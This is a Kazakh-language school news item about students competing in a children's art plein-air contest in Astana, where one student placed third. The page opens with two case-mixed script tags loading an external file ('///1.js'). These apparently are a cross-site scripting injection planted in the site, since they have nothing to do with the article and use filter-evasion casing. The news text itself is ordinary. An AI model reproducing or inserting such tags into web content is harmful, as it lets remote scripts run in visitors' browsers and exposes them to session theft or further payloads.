<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

12.06.2017

4-8 маусым аралығында Астана қаласында балалар шығармашылығының «Энергия будущего Казахстана» 1 Республикалық сайыс-пленэрі өтті. Бұл сайысқа тәжірибелі мұғалім, Булгакова Наталья Андреевна жетекшілігімен, мектебіміздің оқушылары – Мотовилова Валерия, Ведеева Людмила, Кайроллақызы Асана белсене қатысты. Ұйымдастырушылар сайыс қатысушылары үшін  пленэр кескіндемесі бойынша шеберлік сыныптарын, өнер тарихы бойынша әңгімелесулерді, экскурсиялық бағдарламаны, мұражайға баруды, ойын-сауық бағдарламасын ұйымдастырды. Дегенмен, сол мезетпен қатарлас балалар шығармашылық тапсырмаларды орындап, екі кезең нәтижесі -үй тапсырмасы мен сайыста орындалған жұмыстар бойынша әділ қазылар алқасының шешімімен жеңімпаздар анықталды.  Барлық қатысушылар сертификат, ал Жеңімпаздар диплом мен бағалы сыйлықтарды алды. 2 «д» курс оқушысы Кайроллақызы Асана 3 орынға ие болды! Асананы лайықты жеңісімен құттықтаймыз!

Просмотров: 348


Пікір қосу



Деректерді қолтаңбаға қосу